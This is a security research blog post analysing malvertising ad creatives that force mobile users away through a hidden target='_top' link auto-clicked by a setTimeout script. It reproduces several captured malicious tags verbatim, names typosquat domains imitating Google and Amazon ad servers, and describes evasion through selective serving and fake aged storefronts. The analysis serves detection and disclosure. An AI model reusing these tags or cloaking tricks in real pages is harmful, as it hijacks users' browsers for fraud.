Disclaimer: This blog post includes code snippets from actual creatives that have been served on the web. We do our best to redact the identifying information of any intermediate ad-tech vendors or hijacked publishers, because good services are often used and abused by bad actors. It’s important not to interpret an individual ad-tech vendor’s presence in a bad creative with an overt act of malvertising or fraud.

In my last post, I talked about how most forced redirects come from a well known loophole that allows the following to be executed cross-domain:

window.top.location = [

http://redirect

]

With this having been an issue for some years, it’s safe to say that the more sophisticated bad actors know that we know their tricks, and they will go to great lengths to obfuscate their code and conceal their behavior.

In recent months, we’ve seen a lot of activity emanating from one bad actor in particular, and it stands out to me that they have a pretty clever approach to the mobile redirect.

Check out this ad tag:

<a target=_blank href=’https://itunes.apple.com/us/app/world-of-tanks-blitz/id859204347?mt=8’><img src=’https://[REDACTED]/getad.img?libBID=418779’></img></a><a hidden id=’OivvTkFYHFk’ target=’_top’ href=’http://tpc.googlesyndlcation.com/765f7543-d944-406c-9146-b3b292397327?siteid={siteid}&sitedomain=220926845’></a>
<script type=’text/javascript’>function TpoBFJDMsFSaTa(){document.getElementById(‘OivvTkFYHFk’).click();}setTimeout(TpoBFJDMsFSaTa, 10000);</script>

Before we dive into the code, I’d like to point out the use of a very decieving domain:

http://tpc.googlesyndlcation.com/765f7543-d944-406c-9146-b3b292397327?siteid={siteid}&sitedomain=220926845

At first glance, tpc.googlesyndlcation.com might look like the familiar Google ad serving endpoint that we have all seen countless times before. Let’s take a look at what happens if we convert the domain to all caps:

TPC.GOOGLESYNDLCATION.COM

The typo domain alone should sound all kinds of alarms and warrant blacklisting, but perhaps even more interesting is the creative tag and its elegant method of spawning a redirect. Let’s start by splitting up the tag into smaller, easier to digest segments:

<a target=_blank href=’https://itunes.apple.com/us/app/world-of-tanks-blitz/id859204347?mt=8’><img src=’https://[REDACTED]/getad.img?libBID=418779’></img></a>

Here we have an image and a clickthrough link. The landing page is an iTunes game that matches with the creative being served. This could very well be ripped off from a legitimate ad campaign or just as easily faked. This is not the malicious part of this tag, but merely a sort of “cloak” to make it look legitimate.

<a hidden id=’OivvTkFYHFk’ target=’_top’ href=’http://tpc.googlesyndlcation.com/765f7543-d944-406c-9146-b3b292397327?siteid={siteid}&sitedomain=220926845’></a>

This is where the tag gets interesting. Let’s break down this hidden anchor tag further:

<a hidden

This tag will be hidden from view.

id=’OivvTkFYHFk’

Assign a cryptic ID to this a tag.

target=”_top”

This tells the browser to load the link destination in the full body of the browser window if the link is being loaded from within an iframe. It’s essentially a clever way of doing window.top.location! Does that ring a bell?

<script type=’text/javascript’>function TpoBFJDMsFSaTa(){document.getElementById(‘OivvTkFYHFk’).click();}setTimeout(TpoBFJDMsFSaTa, 10000);</script>

This JavaScript one-liner defines a function that finds the hidden link and clicks it:

function TpoBFJDMsFSaTa(){document.getElementById(‘OivvTkFYHFk’).click();}

And then sets a timer to execute that function in 10 seconds:

setTimeout(TpoBFJDMsFSaTa, 10000);

Essentially, the attacker here put together a window.top.location redirect without ever having to use that notorious, and easily detectable line of code!

Now that we have identified a cohesive pattern in how this particular bad actor handles ad serving, we can take some of the data points from our analysis and see what else we can find in our database of creative ad traces.

At Confiant, we see a large volume of creatives as they serve in a live environment, but we also scan creative tags for suspicious activity in a variety of virtual environments. The most fascinating findings come out of comparing the behaviors of a malicious vendor in these different environments. Such a comparison will usually surface the presence of anti-malware evasion tactics, if they exist.

Right away, we find similar bad creatives. Here’s an example:

document.write(”<a target=_blank href=’https://itunes.apple.com/us/app/harrys-shaving-grooming/id990024014
?mt=8’><img src=’https://[REDACTED]/storage/7/8/c/78ccf25b91cbbd6625bdca4cea488247a3f58ac0.gif’>
</img></a><a hidden id=’hid_1’ target=’_top’ href=’http://aax-eu.amazon-absystem.com/c3c3f4db-67d2-4837-9b1c-665e4037a30c
?siteid={siteid}&sitedomain=[site_id]’></a><scr”+”ipt>setTimeout(function(){document.getElementById(’hid_1’
).click();}, 10000);</scr”+”ipt>”)

Looks like it’s a creative with the same M-O, but with a new ad-tech typo domain for the blacklist:

http://aax-eu.amazon-absystem.com

Perusing our collection of creative scans surfaces another interesting find:

This is an excerpt from a Har dump of one of our scans, where we have the all too familiar TPC.GOOGLESYNDICATION.COM tag:

document.write(”<a target=_blank href=’https://[REDACTED]/fitness-equipment-financing’><img src=’https://tpc.googlesyndication.com/simgad/4463120308239653022’></img></a>”)

If we look closely, we’ll notice a couple of fascinating details. First, we see right away that the tag is incomplete, but more importantly we see that this time, the bad actor is masquerading their activity by borrowing a real googlesyndication.com tag. Furthermore, the malicious JavaScript was omitted during this scan, which tells us that the redirect code is not actually served on every single impression!

Here it is again captured from a live impression:

<a target=_blank href=’https://[REDACTED]/fitness-equipment-financing’><img src=’https://tpc.googlesyndication.com/simgad/4463120308239653022’></img></a><a hidden id=’JFDGFlwYj’ target=’_top’ href=’http://tpc.googlesyndlcation.com/f0b20741-50db-4958-8633-328b117ec7a8?siteid={siteid}&sitedomain=pbh-network.com’></a>
<script type=’text/javascript’>function OdeetudfgqeoS(){document.getElementById(’JFDGFlwYj’).click();}setTimeout(OdeetudfgqeoS, 8000);</script>

But of course this comes as no surprise. We’ve seen examples of the same exact markup in other iterations of creative scans as well. This huge difference between the scan and the live capture make it pretty clear that this bad actor is using some advanced targeting to determine when to serve the redirect code and when not to. Furthermore, the domain found to be serving the ad in the first place gives a very important glimpse into this malvertiser’s sophistication:

https://idsync.wetwearsuits.com/www/pixel/tap.php?cid=MTItMmJmNGY2ZTgwM2MxNzRhLTM5OV8x&bid=1333&source=...

Certainly “wetwearsuits.com” is likely an inappropriate ad-serving domain, but there is more than that happening here. First of all, the structure of the ad call is disguised with the “idsync” prefix, which is a very common endpoint for cookie matching across some big ad tech vendors. In addition, these folks went so far as to host a realistic, but fake e-commerce store on the wetwearsuits.com domain- likely to usurp human analysis of the domain.

The domain is at this time defunct, so I can’t offer a screenshot, but I can offer a further glimpse into where it came from:

This all likely begs the question of why? Why invest $100 into a lame “starter site” instead of registering a new one for $9.99, especially if the original starter content is going to be tossed out for pirated e-commerce content? My best guess is that the folks behind this campaign understand the value in an aged domain.

It’s worth noting though, that the short lifespan here is not an outlier. In only several months these guys have bought the domain, pirated a site, deployed their ad serving mechanism, ran a malvertising campaign, and discarded the domain completely, only to move on to the next one.

As a closing thought, I want to pose a question:

To what extent are vendors of internet infrastructure complicit in this activity? After all, there is not a single scenario where it’s okay for anyone to use the GOOGLESYNDLCATION or AMAZON-ABSYSTEM domains for ANY reason. I have since contacted the abuse departments of the domain owner’s registrar, DNS, and hosting providers, but have gotten little to no action in response.